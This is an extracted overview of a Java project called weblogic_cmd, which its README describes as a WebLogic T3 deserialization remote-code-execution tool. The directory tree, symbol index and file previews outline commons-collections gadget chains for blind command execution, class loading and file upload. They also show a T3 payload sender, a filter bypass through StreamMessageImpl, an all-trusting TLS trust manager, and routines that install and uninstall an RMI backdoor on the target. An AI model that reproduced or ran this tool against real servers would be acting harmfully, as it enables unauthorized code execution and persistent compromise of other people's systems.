gitextract_xf0mq9cb/ ├── .idea/ │ ├── artifacts/ │ │ └── weblogic_cmd_jar.xml │ ├── description.html │ ├── excludeFromValidation.xml │ ├── libraries/ │ │ ├── commons_cli_1_4.xml │ │ ├── commons_collections_3_1.xml │ │ ├── jsafeFIPS.xml │ │ ├── wlcipher.xml │ │ └── wlfullclient.xml │ ├── misc.xml │ ├── modules.xml │ ├── project-template.xml │ └── uiDesigner.xml ├── README.md ├── lib/ │ ├── commons-cli-1.4.jar │ ├── commons-collections-3.1.jar │ ├── jsafeFIPS.jar │ ├── wlcipher.jar │ └── wlfullclient.jar ├── src/ │ ├── META-INF/ │ │ └── MANIFEST.MF │ ├── com/ │ │ └── supeream/ │ │ ├── Main.java │ │ ├── payload/ │ │ │ ├── PayloadTest.java │ │ │ └── RemoteImpl.java │ │ ├── serial/ │ │ │ ├── BytesOperation.java │ │ │ ├── Reflections.java │ │ │ ├── SerialDataGenerator.java │ │ │ └── Serializables.java │ │ ├── ssl/ │ │ │ ├── SocketFactory.java │ │ │ ├── TrustManagerImpl.java │ │ │ └── WeblogicTrustManager.java │ │ └── weblogic/ │ │ ├── BypassPayloadSelector.java │ │ ├── ObjectTest.java │ │ ├── T3ProtocolOperation.java │ │ ├── T3Test.java │ │ └── WebLogicOperation.java │ └── weblogic/ │ ├── jms/ │ │ └── common/ │ │ └── StreamMessageImpl.java │ ├── security/ │ │ └── utils/ │ │ ├── SSLSetup.java │ │ └── SSLTrustValidator.java │ └── socket/ │ └── ChannelSSLSocketFactory.java └── weblogic_cmd.iml
SYMBOL INDEX (180 symbols across 19 files)
FILE: src/com/supeream/Main.java
class Main (line 20) | public class Main {
method getInitialContext (line 30) | public static Context getInitialContext(String url) throws NamingExcep...
method checkIsAlreadyInstalled (line 38) | public static boolean checkIsAlreadyInstalled(String host, String port) {
method executeBlind (line 58) | public static void executeBlind(String host, String port) throws Excep...
method converUrl (line 69) | public static String converUrl(String host, String port) {
method cdConcat (line 77) | private static String cdConcat(List<String> cds) {
method invokeRmi (line 86) | public static void invokeRmi(ClusterMasterRemote remoteCode) throws Ex...
method main (line 142) | public static void main(String[] args) {
FILE: src/com/supeream/payload/PayloadTest.java
class PayloadTest (line 9) | public class PayloadTest {
method main (line 10) | public static void main(String[] args) throws Exception {
FILE: src/com/supeream/payload/RemoteImpl.java
class RemoteImpl (line 21) | public class RemoteImpl implements ClusterMasterRemote {
method main (line 23) | public static void main(String[] args) {
method setServerLocation (line 44) | @Override
method uploadFile (line 49) | public static void uploadFile(String path, byte[] content) {
method getServerLocation (line 61) | @Override
FILE: src/com/supeream/serial/BytesOperation.java
class BytesOperation (line 10) | public class BytesOperation {
method hexStringToBytes (line 13) | public static byte[] hexStringToBytes(String hexString) {
method charToByte (line 31) | private static byte charToByte(char c) {
method byteMerger (line 35) | public static byte[] byteMerger(byte[] byte_1, byte[] byte_2) {
method bytesToHexString (line 42) | public static String bytesToHexString(byte[] src) {
method GetByteByFile (line 58) | public static byte[] GetByteByFile(String FilePath) throws Exception {
method main (line 72) | public static void main(String[] args) throws Exception {
FILE: src/com/supeream/serial/Reflections.java
class Reflections (line 6) | public class Reflections {
method getField (line 8) | public static Field getField(final Class<?> clazz, final String fieldN...
method setFieldValue (line 17) | public static void setFieldValue(final Object obj, final String fieldN...
method getFieldValue (line 22) | public static Object getFieldValue(final Object obj, final String fiel...
method getFirstCtor (line 27) | public static Constructor<?> getFirstCtor(final String name) throws Ex...
FILE: src/com/supeream/serial/SerialDataGenerator.java
class SerialDataGenerator (line 20) | public class SerialDataGenerator {
method serialData (line 26) | private static byte[] serialData(Transformer[] transformers) throws Ex...
method defineAndLoadPayloadTransformerChain (line 49) | private static Transformer[] defineAndLoadPayloadTransformerChain(Stri...
method uploadTransformerChain (line 62) | private static Transformer[] uploadTransformerChain(String className, ...
method blindExecutePayloadTransformerChain (line 75) | private static Transformer[] blindExecutePayloadTransformerChain(Strin...
method serialRmiDatas (line 90) | public static byte[] serialRmiDatas(String[] bootArgs) throws Exception {
method serialBlindDatas (line 94) | public static byte[] serialBlindDatas(String[] execArgs) throws Except...
method serialUploadDatas (line 98) | public static byte[] serialUploadDatas(String filePath, byte[] content...
FILE: src/com/supeream/serial/Serializables.java
class Serializables (line 5) | public class Serializables {
method serialize (line 7) | public static byte[] serialize(final Object obj) throws IOException {
method serialize (line 13) | public static void serialize(final Object obj, final OutputStream out)...
method deserialize (line 20) | public static Object deserialize(final byte[] serialized) throws IOExc...
method deserialize (line 25) | public static Object deserialize(final InputStream in) throws ClassNot...
FILE: src/com/supeream/ssl/SocketFactory.java
class SocketFactory (line 14) | public class SocketFactory {
method SocketFactory (line 15) | private SocketFactory() {
method newSocket (line 18) | public static Socket newSocket(String host, int port) throws Exception {
FILE: src/com/supeream/ssl/TrustManagerImpl.java
class TrustManagerImpl (line 10) | public class TrustManagerImpl implements X509TrustManager {
method checkClientTrusted (line 12) | @Override
method checkServerTrusted (line 16) | @Override
method getAcceptedIssuers (line 21) | @Override
FILE: src/com/supeream/ssl/WeblogicTrustManager.java
class WeblogicTrustManager (line 10) | public class WeblogicTrustManager implements TrustManager {
method certificateCallback (line 11) | @Override
FILE: src/com/supeream/weblogic/BypassPayloadSelector.java
class BypassPayloadSelector (line 13) | public class BypassPayloadSelector {
method marshalledObject (line 15) | private static Object marshalledObject(Object payload) {
method streamMessageImpl (line 26) | public static Object streamMessageImpl(byte[] object) throws Exception {
method selectBypass (line 33) | public static Object selectBypass(Object payload) throws Exception {
FILE: src/com/supeream/weblogic/ObjectTest.java
class ObjectTest (line 10) | public class ObjectTest {
method main (line 11) | public static void main(String[] args) throws Exception {
FILE: src/com/supeream/weblogic/T3ProtocolOperation.java
class T3ProtocolOperation (line 22) | public class T3ProtocolOperation {
method send (line 25) | public static void send(String host, String port, byte[] payload) thro...
FILE: src/com/supeream/weblogic/T3Test.java
class T3Test (line 35) | public class T3Test {
method main (line 37) | public static void main(String[] args) throws Exception {
FILE: src/com/supeream/weblogic/WebLogicOperation.java
class WebLogicOperation (line 12) | public class WebLogicOperation {
method installRmi (line 14) | public static void installRmi(String host, String port) throws Excepti...
method unInstallRmi (line 19) | public static void unInstallRmi(String host, String port) throws Excep...
method blind (line 24) | public static void blind(String host, String port) throws Exception {
method uploadFile (line 29) | public static void uploadFile(String host, String port, String filePat...
method blindExecute (line 34) | public static void blindExecute(String host, String port, String cmd) ...
FILE: src/weblogic/jms/common/StreamMessageImpl.java
class StreamMessageImpl (line 17) | public final class StreamMessageImpl extends MessageImpl implements Stre...
method StreamMessageImpl (line 46) | public StreamMessageImpl() {
method StreamMessageImpl (line 49) | public StreamMessageImpl(StreamMessage var1) throws IOException, JMSEx...
method StreamMessageImpl (line 53) | public StreamMessageImpl(StreamMessage var1, Destination var2, Destina...
method getType (line 69) | public byte getType() {
method nullBody (line 73) | public void nullBody() {
method putTypeBack (line 83) | private void putTypeBack() {
method readPastEnd (line 90) | private String readPastEnd() {
method streamReadError (line 94) | private String streamReadError() {
method streamWriteError (line 98) | private String streamWriteError() {
method streamConversionError (line 102) | private String streamConversionError(String var1, String var2) {
method readType (line 106) | private byte readType() throws JMSException {
method writeType (line 122) | private void writeType(byte var1) throws JMSException {
method readBoolean (line 132) | public boolean readBoolean() throws JMSException {
method readByte (line 158) | public byte readByte() throws JMSException {
method readShort (line 189) | public short readShort() throws JMSException {
method readChar (line 227) | public char readChar() throws JMSException {
method readInt (line 253) | public int readInt() throws JMSException {
method readLong (line 292) | public long readLong() throws JMSException {
method readFloat (line 332) | public float readFloat() throws JMSException {
method readDouble (line 363) | public double readDouble() throws JMSException {
method readString (line 399) | public String readString() throws JMSException {
method readBytes (line 443) | public int readBytes(byte[] var1) throws JMSException {
method readObject (line 495) | public Object readObject() throws JMSException {
method writeBoolean (line 546) | public void writeBoolean(boolean var1) throws JMSException {
method writeByte (line 556) | public void writeByte(byte var1) throws JMSException {
method writeShort (line 566) | public void writeShort(short var1) throws JMSException {
method writeChar (line 576) | public void writeChar(char var1) throws JMSException {
method writeInt (line 586) | public void writeInt(int var1) throws JMSException {
method writeLong (line 596) | public void writeLong(long var1) throws JMSException {
method writeFloat (line 606) | public void writeFloat(float var1) throws JMSException {
method writeDouble (line 616) | public void writeDouble(double var1) throws JMSException {
method writeString (line 626) | public void writeString(String var1) throws JMSException {
method writeBytes (line 639) | public void writeBytes(byte[] var1) throws JMSException {
method writeBytes (line 643) | public void writeBytes(byte[] var1, int var2, int var3) throws JMSExce...
method writeObject (line 658) | public void writeObject(Object var1) throws JMSException {
method reset (line 691) | public void reset() throws JMSException {
method copy (line 704) | public MessageImpl copy() throws JMSException {
method checkWritable (line 721) | private void checkWritable() throws JMSException {
method checkReadable (line 732) | private void checkReadable() throws JMSException {
method toString (line 744) | public String toString() {
method writeExternal (line 748) | public void writeExternal(ObjectOutput paramObjectOutput) throws IOExc...
method decompressMessageBody (line 802) | public final void decompressMessageBody() throws JMSException {
method readExternal (line 816) | public void readExternal(ObjectInput var1) throws IOException, ClassNo...
method getPayloadSize (line 870) | public long getPayloadSize() {
method typeCodeToString (line 874) | private String typeCodeToString(int var1) {
method writeStringInternal (line 882) | private void writeStringInternal(String var1) throws IOException, JMSE...
method readStringInternal (line 893) | private String readStringInternal(byte var1) throws IOException {
method getDataBuffer (line 897) | public final byte[] getDataBuffer() {
method getDataSize (line 901) | public final int getDataSize() {
method setDataBuffer (line 905) | public final void setDataBuffer(byte[] var1, int var2) {
method getMessageBody (line 910) | public byte[] getMessageBody(int[] var1) throws JMSException {
FILE: src/weblogic/security/utils/SSLSetup.java
class SSLSetup (line 37) | public final class SSLSetup extends SSLSetupLogging {
method SSLSetup (line 58) | public SSLSetup() {
method getLicenseLevel (line 61) | public static synchronized int getLicenseLevel() {
method initForServer (line 73) | public static synchronized void initForServer() {
method setSSLDelegate (line 78) | private static void setSSLDelegate(String var0) {
method getSSLDelegateInstance (line 91) | static SSLContextDelegate getSSLDelegateInstance() {
method getIOModel (line 110) | public static int getIOModel() {
method logSSLRejections (line 115) | public static boolean logSSLRejections() {
method setIOModel (line 130) | public static void setIOModel(int var0) {
method getProtocolVersion (line 140) | public static int getProtocolVersion() {
method getEnforceConstraints (line 163) | public static int getEnforceConstraints() {
method getSSLContext (line 190) | public static SSLContextWrapper getSSLContext() throws SocketException {
method getSSLContext (line 194) | public static SSLContextWrapper getSSLContext(SSLClientInfo var0) thro...
method applyInfo (line 214) | private static void applyInfo(SSLContextWrapper var0, SSLClientInfo va...
method getTrustedCAs (line 278) | private static X509Certificate[] getTrustedCAs(SSLContextWrapper var0) {
method setFailureDetails (line 322) | public static void setFailureDetails(SSLSession var0, String var1) {
method getFailureDetails (line 326) | public static String getFailureDetails(SSLSession var0) {
method logPlaintextProtocolClientError (line 330) | public static void logPlaintextProtocolClientError(SSLSocket var0, Str...
method logProtocolVersionError (line 341) | public static void logProtocolVersionError(SSLSocket var0) {
method logCertificateChainConstraintsStrictNonCriticalFailure (line 352) | public static void logCertificateChainConstraintsStrictNonCriticalFail...
method logCertificateChainMissingConstraintsFailure (line 363) | public static void logCertificateChainMissingConstraintsFailure(SSLSoc...
method logCertificateChainNotACaConstraintsFailure (line 374) | public static void logCertificateChainNotACaConstraintsFailure(SSLSock...
method logCertificateChainPathLenExceededConstraintsFailure (line 385) | public static void logCertificateChainPathLenExceededConstraintsFailur...
method logCertificateChainConstraintsConversionFailure (line 396) | public static void logCertificateChainConstraintsConversionFailure(SSL...
method logCertificateChainUnrecognizedExtensionFailure (line 407) | public static void logCertificateChainUnrecognizedExtensionFailure(SSL...
method logCertificateChainAlgKeyUsageFailure (line 418) | public static void logCertificateChainAlgKeyUsageFailure(SSLSocket var...
method logCertificateChainCheckKeyUsageFailure (line 429) | public static void logCertificateChainCheckKeyUsageFailure(SSLSocket v...
method logCertificateChainCertSignKeyUsageFailure (line 440) | public static void logCertificateChainCertSignKeyUsageFailure(SSLSocke...
method logCertificatePolicyIdDoesntExistIntheList (line 451) | public static void logCertificatePolicyIdDoesntExistIntheList(SSLSocke...
method logPolicyQualifierIdNotCPS (line 462) | public static void logPolicyQualifierIdNotCPS(SSLSocket var0, String v...
method getPeerName (line 473) | public static String getPeerName(SSLSocket var0) {
method logAlertReceivedFromPeer (line 493) | public static void logAlertReceivedFromPeer(SSLSocket var0, int var1) {
method getSSLTrustProperties (line 642) | public static Properties getSSLTrustProperties(ServerMBean var0) {
method isFatClient (line 663) | static boolean isFatClient() {
method logSSLUsingNullCipher (line 667) | public static void logSSLUsingNullCipher() {
method add (line 671) | private static void add(Properties var0, String var1, String var2) {
FILE: src/weblogic/security/utils/SSLTrustValidator.java
class SSLTrustValidator (line 18) | public class SSLTrustValidator implements SSLTruster {
method SSLTrustValidator (line 26) | public SSLTrustValidator() {
method setTrustManager (line 33) | public void setTrustManager(TrustManager var1) {
method setRootCAFingerPrints (line 37) | public void setRootCAFingerPrints(byte[][] var1) {
method isPeerCertsRequired (line 41) | public boolean isPeerCertsRequired() {
method setPeerCertsRequired (line 45) | public void setPeerCertsRequired(boolean var1) {
method setAllowOverride (line 49) | public void setAllowOverride(boolean var1) {
method setProxyMapping (line 53) | public void setProxyMapping(String var1, String var2) {
method validationCallback (line 58) | public int validationCallback(X509Certificate[] var1, int var2, SSLSoc...
method getTrustManagerClassName (line 141) | private String getTrustManagerClassName() {
method getPeerName (line 145) | private String getPeerName(SSLSocket var1) {
method logValidationError (line 157) | private void logValidationError(int var1, SSLSocket var2) {
FILE: src/weblogic/socket/ChannelSSLSocketFactory.java
class ChannelSSLSocketFactory (line 32) | public final class ChannelSSLSocketFactory extends SSLSocketFactory {
method ChannelSSLSocketFactory (line 37) | public ChannelSSLSocketFactory(ServerChannel var1) {
method createSocket (line 46) | public Socket createSocket(String var1, int var2) throws IOException, ...
method initializeFromThread (line 50) | public SSLSocketFactory initializeFromThread() throws IOException {
method createSocket (line 55) | public Socket createSocket(String var1, int var2, InetAddress var3, in...
method createSocket (line 59) | public Socket createSocket(InetAddress var1, int var2) throws IOExcept...
method createSocket (line 65) | public Socket createSocket(InetAddress var1, int var2, InetAddress var...
method createSocket (line 69) | public Socket createSocket(InetAddress var1, int var2, int var3) throw...
method getDefaultCipherSuites (line 103) | public String[] getDefaultCipherSuites() {
method getSupportedCipherSuites (line 111) | public String[] getSupportedCipherSuites() {
method createSocket (line 119) | public Socket createSocket(Socket var1, String var2, int var3, boolean...
method getSocketFactory (line 123) | private javax.net.ssl.SSLSocketFactory getSocketFactory() throws IOExc...
method getSSLClientInfo (line 132) | public SSLClientInfo getSSLClientInfo() {
method createSSLClientInfo (line 136) | private SSLClientInfo createSSLClientInfo() throws IOException {
method setSSLClientInfo (line 149) | public void setSSLClientInfo(SSLClientInfo var1) {
Condensed preview — 39 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (149K chars).
[
{
"path": ".idea/artifacts/weblogic_cmd_jar.xml",
"chars": 873,
"preview": "<component name=\"ArtifactManager\">\n <artifact type=\"jar\" name=\"weblogic_cmd:jar\">\n <output-path>$PROJECT_DIR$/out/ar"
},
{
"path": ".idea/description.html",
"chars": 97,
"preview": "<html>Simple <b>Java</b> application that includes a class with <code>main()</code> method</html>"
},
{
"path": ".idea/excludeFromValidation.xml",
"chars": 216,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project version=\"4\">\n <component name=\"ExcludeFromValidation\">\n <file url=\"f"
},
{
"path": ".idea/libraries/commons_cli_1_4.xml",
"chars": 220,
"preview": "<component name=\"libraryTable\">\n <library name=\"commons-cli-1.4\">\n <CLASSES>\n <root url=\"jar://$PROJECT_DIR$/li"
},
{
"path": ".idea/libraries/commons_collections_3_1.xml",
"chars": 236,
"preview": "<component name=\"libraryTable\">\n <library name=\"commons-collections-3.1\">\n <CLASSES>\n <root url=\"jar://$PROJECT"
},
{
"path": ".idea/libraries/jsafeFIPS.xml",
"chars": 208,
"preview": "<component name=\"libraryTable\">\n <library name=\"jsafeFIPS\">\n <CLASSES>\n <root url=\"jar://$PROJECT_DIR$/lib/jsaf"
},
{
"path": ".idea/libraries/wlcipher.xml",
"chars": 206,
"preview": "<component name=\"libraryTable\">\n <library name=\"wlcipher\">\n <CLASSES>\n <root url=\"jar://$PROJECT_DIR$/lib/wlcip"
},
{
"path": ".idea/libraries/wlfullclient.xml",
"chars": 291,
"preview": "<component name=\"libraryTable\">\n <library name=\"wlfullclient\">\n <CLASSES>\n <root url=\"jar://$PROJECT_DIR$/lib/w"
},
{
"path": ".idea/misc.xml",
"chars": 404,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project version=\"4\">\n <component name=\"ProjectKey\">\n <option name=\"state\" va"
},
{
"path": ".idea/modules.xml",
"chars": 264,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project version=\"4\">\n <component name=\"ProjectModuleManager\">\n <modules>\n "
},
{
"path": ".idea/project-template.xml",
"chars": 89,
"preview": "<template>\n <input-field default=\"com.company\">IJ_BASE_PACKAGE</input-field>\n</template>"
},
{
"path": ".idea/uiDesigner.xml",
"chars": 8792,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project version=\"4\">\n <component name=\"Palette2\">\n <group name=\"Swing\">\n "
},
{
"path": "README.md",
"chars": 418,
"preview": "# weblogic_cmd\nweblogic t3 deserialization rce\n\n1. 直接通过加载字节码的方式来加载class,执行无文件生成。通过绑定rmi来实现回显。\n2. 支持t3s\n3. 支持StreamMessag"
},
{
"path": "src/META-INF/MANIFEST.MF",
"chars": 53,
"preview": "Manifest-Version: 1.0\nMain-Class: com.supeream.Main\n\n"
},
{
"path": "src/com/supeream/Main.java",
"chars": 8686,
"preview": "package com.supeream;\n\nimport com.supeream.serial.BytesOperation;\nimport com.supeream.ssl.WeblogicTrustManager;\nimport c"
},
{
"path": "src/com/supeream/payload/PayloadTest.java",
"chars": 1141,
"preview": "package com.supeream.payload;\n\nimport com.supeream.serial.BytesOperation;\nimport sun.org.mozilla.javascript.internal.Def"
},
{
"path": "src/com/supeream/payload/RemoteImpl.java",
"chars": 3078,
"preview": "package com.supeream.payload;\n\nimport sun.tools.asm.TryData;\nimport weblogic.cluster.singleton.ClusterMasterRemote;\nimpo"
},
{
"path": "src/com/supeream/serial/BytesOperation.java",
"chars": 2312,
"preview": "package com.supeream.serial;\n\n//\n// Source code recreated from a .class file by IntelliJ IDEA\n// (powered by Fernflower "
},
{
"path": "src/com/supeream/serial/Reflections.java",
"chars": 1142,
"preview": "package com.supeream.serial;\n\nimport java.lang.reflect.Constructor;\nimport java.lang.reflect.Field;\n\npublic class Reflec"
},
{
"path": "src/com/supeream/serial/SerialDataGenerator.java",
"chars": 12615,
"preview": "package com.supeream.serial;\n\nimport com.supeream.weblogic.BypassPayloadSelector;\nimport org.apache.commons.collections."
},
{
"path": "src/com/supeream/serial/Serializables.java",
"chars": 987,
"preview": "package com.supeream.serial;\n\nimport java.io.*;\n\npublic class Serializables {\n\n public static byte[] serialize(final "
},
{
"path": "src/com/supeream/ssl/SocketFactory.java",
"chars": 925,
"preview": "package com.supeream.ssl;\n\nimport com.supeream.Main;\n\nimport javax.net.ssl.SSLContext;\nimport javax.net.ssl.SSLSocketFac"
},
{
"path": "src/com/supeream/ssl/TrustManagerImpl.java",
"chars": 618,
"preview": "package com.supeream.ssl;\n\nimport javax.net.ssl.X509TrustManager;\nimport java.security.cert.CertificateException;\nimport"
},
{
"path": "src/com/supeream/ssl/WeblogicTrustManager.java",
"chars": 341,
"preview": "package com.supeream.ssl;\n\nimport weblogic.security.SSL.TrustManager;\n\nimport java.security.cert.X509Certificate;\n\n/**\n "
},
{
"path": "src/com/supeream/weblogic/BypassPayloadSelector.java",
"chars": 1212,
"preview": "package com.supeream.weblogic;\n\nimport com.supeream.Main;\nimport com.supeream.serial.Serializables;\nimport weblogic.corb"
},
{
"path": "src/com/supeream/weblogic/ObjectTest.java",
"chars": 819,
"preview": "package com.supeream.weblogic;\n\nimport com.supeream.serial.BytesOperation;\n\nimport java.io.*;\n\n/**\n * Created by nike on"
},
{
"path": "src/com/supeream/weblogic/T3ProtocolOperation.java",
"chars": 4782,
"preview": "package com.supeream.weblogic;\n\n//\n// Source code recreated from a .class file by IntelliJ IDEA\n// (powered by Fernflowe"
},
{
"path": "src/com/supeream/weblogic/T3Test.java",
"chars": 8648,
"preview": "package com.supeream.weblogic;\n\nimport com.supeream.Main;\nimport com.supeream.payload.RemoteImpl;\nimport com.supeream.se"
},
{
"path": "src/com/supeream/weblogic/WebLogicOperation.java",
"chars": 1815,
"preview": "package com.supeream.weblogic;\n\n//\n// Source code recreated from a .class file by IntelliJ IDEA\n// (powered by Fernflowe"
},
{
"path": "src/weblogic/jms/common/StreamMessageImpl.java",
"chars": 36908,
"preview": "//\n// Source code recreated from a .class file by IntelliJ IDEA\n// (powered by Fernflower decompiler)\n//\n\npackage weblog"
},
{
"path": "src/weblogic/security/utils/SSLSetup.java",
"chars": 27548,
"preview": "//\n// Source code recreated from a .class file by IntelliJ IDEA\n// (powered by Fernflower decompiler)\n//\n\npackage weblog"
},
{
"path": "src/weblogic/security/utils/SSLTrustValidator.java",
"chars": 7778,
"preview": "//\n// Source code recreated from a .class file by IntelliJ IDEA\n// (powered by Fernflower decompiler)\n//\n\npackage weblog"
},
{
"path": "src/weblogic/socket/ChannelSSLSocketFactory.java",
"chars": 6767,
"preview": "//\n// Source code recreated from a .class file by IntelliJ IDEA\n// (powered by Fernflower decompiler)\n//\n\npackage weblog"
},
{
"path": "weblogic_cmd.iml",
"chars": 780,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<module type=\"JAVA_MODULE\" version=\"4\">\n <component name=\"NewModuleRootManager\" "
}
]
// ... and 5 more files (download for full content)